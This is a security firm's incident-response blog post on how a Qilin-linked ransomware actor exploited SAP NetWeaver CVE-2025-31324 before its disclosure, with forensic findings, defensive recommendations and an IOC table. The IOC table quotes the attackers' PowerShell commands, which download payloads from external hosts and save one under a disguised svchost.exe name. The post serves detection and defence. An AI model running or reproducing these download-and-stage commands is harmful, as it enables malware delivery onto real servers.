SAP Zero – Frostbite: How Russian RaaS Actor Qilin Exploited CVE-2025-31324 Weeks Before its Public Disclosure

Matan Matalon

May 15, 2025

CVE-2025-31324 hit the security world like a tsunami – an easily exploitable SAP vulnerability affecting enterprise environments across the globe. But while most assumed its exploitation began post-disclosure, new evidence suggests otherwise.

During an incident response led by OP Innovate for a major global enterprise, we uncovered proof that this vulnerability was actively exploited nearly three weeks before it was made public. While recent articles point the finger towards China-Linked APTs, we identified communication with known Cobalt Strike C2 infrastructure and IP addresses linked directly to Qilin, a notorious Russian-speaking Ransomware-as-a-Service group.

What started as a routine post-disclosure investigation quickly evolved into a rare glimpse of zero-day exploitation in the wild – and possibly, early access to a vulnerability that hadn’t yet made headlines.

In this blog, we’ll walk you through:

How the attack unfolded weeks before disclosure
What we found during forensic analysis
Why we believe this ties into broader Qilin ransomware operations
What defenders can learn from this breach to prepare for future threats exploiting enterprise middleware like SAP
What organizations using SAP should do to stay safe

CVE-2025-31324: Simple Exploit, Serious Impact

CVE-2025-31324 is a critical vulnerability affecting SAP NetWeaver Visual Composer, a component commonly deployed in large enterprise environments. The flaw lies in the /developmentserver/metadatauploader endpoint, which fails to properly enforce authentication and authorization. This allows an unauthenticated attacker to upload arbitrary files, including web shells, to the server, with ease.

SAP assigned this a CVSS score of 10.0, reflecting its trivial exploitation path and severe impact, including the potential for remote code execution and full system compromise.

What makes this vulnerability especially dangerous is its accessibility:

No authentication required
Attack surface exposed via standard HTTP(S)
Commonly deployed in enterprise SAP environments

By the time SAP released an emergency patch and CISA added it to the KEV catalog, exploitation was underway – and, as we discovered, not just after the disclosure.

As a byproduct of the incident response, OP Innovate developed and deployed a dedicated WASP scanner to detect insecure deserialization vulnerabilities like CVE-2025-31324. This scanner is currently operational and actively scanning for affected SAP NetWeaver components.

Inside the Breach: From Minus-One to Zero

OP Innovate’s investigation revealed two separate exploitations of CVE-2025-31324 within a major enterprise environment. The first occurred nearly three weeks before the vulnerability was publicly disclosed. The second happened shortly after the CVE was published. Although both incidents relied on the same unauthenticated file upload flaw in SAP NetWeaver, the threat infrastructure and observed behavior varied significantly.

During the investigation, our team identified a publicly available Proof of Concept (POC) exploit for CVE-2025-31324 hosted on GitHub. The POC specifically targeted the vulnerable /developmentserver/metadatauploader endpoint and demonstrated how to upload arbitrary .jsp files, without authentication. This code closely matched the method used in the attack, helping us validate the exploitation chain and confirm that the threat actor leveraged this exact vulnerability in the wild.

Pre-Disclosure Exploitation

Initial Access:
Weeks before CVE-2025-31324 appeared in public advisories, an attacker exploited the vulnerable Metadata Uploader endpoint within SAP NetWeaver. The most probable access vector was a misconfigured load balancer that exposed internal services to the internet.

The attacker uploaded several JSP-based webshells to the SAP IRJ directory:

\usr\sap\PP1\J01\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root\

Webshells like random12.jsp, xxkmszdm.jsp, and gpfmddkh.jsp were automatically compiled and enabled full remote code execution.

Once in, the attacker attempted to:

Initiate outbound communication with Cobalt Strike C2 infrastructure (180[.]131[.]145[.]73, 184[.]174[.]96[.]74)
Download and stage a payload (rs64c.exe) from http[:]//184[.]174[.]96[.]74/rs64c.exe, a reverse SOCKS5 tunneling tool
Save the payload locally as svchost.exe and prepare for execution

What We Saw:
The attacker’s use of IP address 184[.]174[.]96[.]74 and the tool rs64c.exe closely matches infrastructure and tools previously associated with Qilin, a Russian-speaking Ransomware-as-a-Service (RaaS) group. This indicates the activity was likely part of an initial access attempt, potentially intended to prepare the ground for a future ransomware attack or to sell access to other threat actors.

What Failed:

The Firewall blocked outbound C2 traffic
The EDR quarantined all downloaded payloads
Neither lateral movement nor persistence mechanisms were observed
The attacker attempted to clean up artifacts by issuing Remove-Item commands for files like random12.jsp and ESC.exe, but the files had already been quarantined by EDR, rendering the cleanup ineffective.

Post-Disclosure Exploitation

Initial Access:
Shortly after CVE-2025-31324 was disclosed publicly, a second exploitation attempt was observed. The attacker again leveraged the same SAP endpoint to upload webshells. However, there is no evidence linking this activity to the pre-disclosure attacker, as no overlapping infrastructure or tools were observed.

What the Attacker Did:
New webshells – such as ran_new.jsp, bdtzvjzm.jsp, and decoxfiv.jsp – were deployed, followed by attempts to download executables via PowerShell:

https://bashupload.com/bSLrt/test.exe → temp.exe
https://bashupload.com/HUbaF/test.exe → temp_new.exe

What Failed:

All download attempts were blocked or quarantined
No execution, lateral movement, nor communication with external infrastructure occurred
Deployed files were manually removed, likely by the attacker

Outcome

In both incidents, the attacker successfully gained initial access and remote code execution by exploiting CVE-2025-31324. However, post-exploitation efforts failed completely in both cases:

No payloads were executed
No data was exfiltrated
No movement beyond the SAP servers occurred

Defensive controls – including network-layer blocking and endpoint containment – prevented what may have been a planned ransomware delivery. The pre-disclosure incident bore the hallmarks of Qilin-linked infrastructure, while the post-disclosure event remains unattributed but similarly neutralized.

The Qilin Connection: Exploiting SAP, Staging for Ransomware

The pre-disclosure activity observed in this incident shows clear overlap with tactics and infrastructure linked to Qilin, a Russian-speaking Ransomware-as-a-Service (RaaS) group active since 2022. Qilin operates through an affiliate model, frequently leveraging Initial Access Brokers (IABs), commodity tooling, and staged infrastructure to prepare environments for high-impact ransomware deployment.

Qilin’s Tactics

According to public threat intelligence from multiple sources, Qilin affiliates typically follow a consistent operational pattern:

Initial access via exposed web applications or phishing
Deployment of tunneling utilities or frameworks like Cobalt Strike
Network scoping, privilege escalation, and lateral movement
Delayed ransomware deployment and data extortion

This incident mirrors several elements of that playbook – including unauthenticated access via a known (or yet to be known) CVE, staging of remote access tools, and outbound communication with known infrastructure.

Supporting Evidence from Official Intelligence

Prior to public awareness of this specific intrusion, Indonesia’s National Cyber and Crypto Agency (BSSN) published an official IOC bulletin – IOC_QILIN Ransomware v1.3, dated April 15, 2025 – listing infrastructure indicators linked to Qilin ransomware activity. This bulletin included:

IP address: 184[.]174[.]96[.]70
File path: C:\ProgramData\rs64c.exe
IP address: 180[.]131[.]145[.]73

Each of these indicators corresponds closely with evidence from this incident:

The attacker downloaded the tunneling tool rs64c.exe from http[:]//184[.]174[.]96[.]74/rs64c.exe — an IP in the same 184[.]174[.]96[.]0/24 subnet as the Qilin-linked IP 184[.]174[.]96[.]70
The binary was written to the exact same path listed in the bulletin: C:\ProgramData\rs64c.exe
The attacker attempted to reach 180[.]131[.]145[.]73, which is explicitly listed in the BSSN bulletin as Qilin infrastructure

These direct overlaps – including exact file paths and IP matches – support a high-confidence assessment that the infrastructure leveraged in this incident aligns with known Qilin operations.

Use of Cobalt Strike

Cobalt Strike remains a standard tool in post-exploitation phases of many RaaS operations, including Qilin. Its modular, red-team-oriented architecture makes it ideal for maintaining persistence, conducting reconnaissance, and staging ransomware payloads. While beacon sessions were blocked in this case, the attacker’s preparation and infrastructure use were consistent with a pre-ransomware staging phase typical of Qilin affiliates.

Recommendations

Based on the observed tactics and mitigated actions during the incident, the following recommendations are aimed at reducing exposure to similar threat activity and improving organizational resilience against exploitation and ransomware staging:

Patch and Restrict Exposure of SAP NetWeaver Systems

Immediately apply the vendor patch addressing CVE-2025-31324 on all affected SAP NetWeaver instances.
Implement strict network segmentation to ensure SAP interfaces are not publicly accessible unless absolutely necessary.
Review reverse proxy/load balancer configurations (e.g., F5) to avoid accidental exposure of internal endpoints.

Web Application Hardening

Enable web application firewalls (WAFs) or filtering controls that block unauthorized file uploads and exploit attempts.
Regularly audit for the presence of custom endpoints (like /metadatauploader) that may bypass authentication or input validation.

Endpoint and Malware Defense

Maintain EDR coverage on all internet-facing and business-critical systems. Ensure automatic quarantine is enabled and up-to-date detection signatures are deployed.
Block execution from temporary paths such as C:\ProgramData\ and other commonly abused directories via group policy or EDR rules.
Prevent execution of unsigned or suspicious binaries downloaded via PowerShell or other scripting interfaces.

Network Controls and C2 Disruption

Enforce egress filtering on firewall and proxy layers to block outbound connections to untrusted IPs and domains.
Block traffic to known Cobalt Strike and reverse proxy tools (e.g., rs64c.exe) using threat intelligence feeds (e.g., ThreatFox, AbuseIPDB).
Monitor for unusual outbound communication to rare external IPs, particularly from servers not expected to initiate such traffic.

PowerShell Monitoring and Restrictions

Enable PowerShell Script Block Logging and Constrained Language Mode on servers.
Alert on suspicious PowerShell activity, especially:
- Invoke-WebRequest or wget
- Downloading to uncommon paths
- Use of Remove-Item for cleanup

Incident Readiness and Response

Review and test incident response plans, especially for pre-ransomware detection.
Ensure your SOC and IR teams are trained to identify early-stage intrusion activity, even before payload delivery (e.g., C2 staging, tunneling tools).
Establish a process to cross-reference alerts with public IOCs, such as those shared in bulletins like BSSN IOC_QILIN v1.3.

Threat Intelligence Integration

Subscribe to and regularly review government and vendor-published IOC feeds.
Integrate IOC correlation into SIEM and SOAR workflows, ensuring real-time blocking or escalation on high-fidelity matches.

Unique Indicators of Compromise (IOCs)

IOC Type	IOC	Hash type	Description	Notes
File Hash	D1C43F8DB230BDF18C61D672440EBA12	MD5	Old executable test.exe	Downloaded to: C:\ProgramData\temp.exe Download URL: https://bashupload.com/bSLrt/test.exe
File Hash	6914B1F5B6843341FAFDFAA9D57818B9	MD5	New executable test.exe (same filename, different hash and URL)	Downloaded to: C:\ProgramData\temp_new.exe Download URL: https://bashupload.com/HUbaF/test.exe
IP Address	http[:]//184[.]174[.]96[.]70		Known Qilin IOC; used as command-and-control or payload host.
IP Address	http[:]//184[.]174[.]96[.]74		Staging IP used to host rs64c.exe reverse tunneler.
IP Address	180[.]131[.]145[.]73		Command-and-control IP associated with Qilin; pinged from target system.
URL	http[:]//184[.]174[.]96[.]70/rs64c.exe		Download URL for reverse SOCKS5 tunneler (IOC-listed host).
URL	http[:]//184[.]174[.]96[.]74/rs64c.exe		Download URL for reverse SOCKS5 tunneler (IOC-listed host).
Command Line	powershell.exe /c invoke-webrequest http://184.174.96.74/rs64c.exe -OutFile c:\programdata\svchost.exe		PowerShell command used to download rs64c.exe to a writable directory.
Command Line	powershell Invoke-WebRequest -Uri https://bashupload.com/bSLrt/test.exe -OutFile C:\ProgramData\temp.exe		Command used to download a malicious executable via Bashupload service.
Command Line	PowerShell Remove-Item		Cleanup command to remove dropped files such as ESC.exe and random12.jsp.	Used to delete ESC.exe and random12.jsp
Path	“\usr\sap\PP1\J01\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root\”		SAP webroot path used by attacker to upload malicious JSP files.	Used for uploading malicious JSP files
Directory	\Device\HarddiskVolume12\usr\sap\PP1\J01\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\		Directory where JSPs were auto-compiled to .class files — evidence of exploitation.	SAP class file pathLocation where JSP files were compiled to .class – Prove exploitation by creating classes
File Names	random12.jsp, duchyofn.jsp, rbekqaun.jsp, rwlrqhrj.jsp, xxkmszdm.jsp, gpfmddkh.jsp, bdtzvjzm.jsp, decoxfiv.jsp, zdulvrqu.jsp, ran_new.jsp		Automatically compiled by the SAP server, generating corresponding .class files inside the \irj\work\ folder	Random 8-char names for stealth.Randomized JSP WebshellUploaded to SAP root path
File Names	“JEE_jsp_bdtzvjzm_1743883325986.class”		Auto-compiled JSP class file resulting from uploaded webshell.
File Names	“test.exe”		Malicious executable downloaded from Bashupload and staged in ProgramData.	Dropped in SAP root path
File Names	“ESC.exe”		Malicious binary dropped via webshell, later deleted via PowerShell.	Dropped in SAP root path

Protect Your Systems with OP Innovate

As cyber threats grow more sophisticated, organizations need trusted partners who can deliver both proactive defense and rapid response. OP Innovate helps businesses stay secure by combining immediate incident response services with advanced vulnerability detection.

Our dedicated WASP scanner continuously monitors SAP environments for critical weaknesses like insecure deserialization flaws, including CVE-2025-31324, helping organizations fix issues before attackers can exploit them. In parallel, our Incident Response (IR) teams are ready to rapidly contain and investigate any breach, minimizing disruption and restoring security.